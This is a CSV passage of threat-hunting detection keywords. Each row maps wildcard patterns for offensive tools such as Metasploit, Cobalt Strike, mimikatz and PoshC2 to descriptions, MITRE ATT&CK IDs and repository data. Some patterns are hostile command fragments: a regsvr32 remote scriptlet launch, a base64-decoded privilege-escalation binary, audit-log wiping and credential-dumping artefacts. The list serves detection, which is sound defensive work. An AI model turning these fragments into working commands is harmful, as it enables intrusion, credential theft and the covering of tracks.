Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.xlsx*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory 
.,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_backdoor.exe*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*_backdoor.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_BloodHound.zip*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*_cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*_dcsync.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_dns_hijack/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*_dns_hijack/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*_dump_users.lst*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*_enum_vault_creds*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*_EvilClippy.*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,0,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*_execve_binsh.s*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_find_sharpgen_dll*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*_generate_bind_payloads_password*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*_generate_scramblesuit_passwd*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*_GetNetLoggedon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*_lfi_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_lsass.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_lsassdecrypt.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*_mouse_rce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_msfconsole*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_msfvenom*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*_nimplant_*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*_peloader.dll*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*_posh-common*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*_prefix_PEzor_*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*_pycobalt_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*_Shellcode.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*_tcp_cc2(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*_udp_cc2(*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*{process_to_inject}.exe*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*| favfreak*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*| hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*|base64 -d > /tmp/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*~/.csexec*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*< /dev/console | uudecode && uncompress*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*<3 eo.oe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -**,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*== NoPowerShell v* ==*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z
-*=Administrator.ccache*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,0,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z
-*=imaohw*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed whoami,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*=resu ten*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed net user,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*> /var/log/audit/audit.log* rm -f .*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked note defense
